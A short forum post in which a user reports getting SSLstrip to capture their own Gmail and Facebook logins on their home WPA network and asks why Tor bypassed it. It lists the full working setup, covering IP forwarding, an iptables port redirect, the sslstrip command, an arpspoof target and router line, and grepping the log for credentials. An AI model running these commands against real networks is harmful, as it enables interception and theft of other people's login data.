Well, I am quite happy to say that I got SSLstrip working quite nicely on my network. It is amazing that I do not get a certificate warning when I go into my gmail and SSLstrip picks up all my confidential info. SSLstrip works fine over my WPA connection. I can surf around like SSLstrip is not there, and it picks up all my SSL info at facebook, gmail, mysite, etc.
Being the curious person that I am, I pushed the Tor button in my Firefox and surfed into my gmail. Using Tor this time I got a real https connection to gmail that was Tored. I thought about it for a moment but could not figure out why. I guess Tor bypassing SSLstrip is a good thing but I am still wondering what’s going on. At Black Hat DC 2009 Feb 16-17 Marlinspike said it worked fine for him.
This is my setup.
# echo "1" > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# python ./sslstrip.py -p -f -l 8080 (-p only SSL POST, -f favicon)
# arpspoof -i ath0 -t (target IP) (router IP)
# cat sslstrip.log | grep (i.e. my email address etc.)
BT4 doing the sniffing and an eeepc doing the surfing. Using 802.11g WPA.
Anybody got any clues?
Best to you all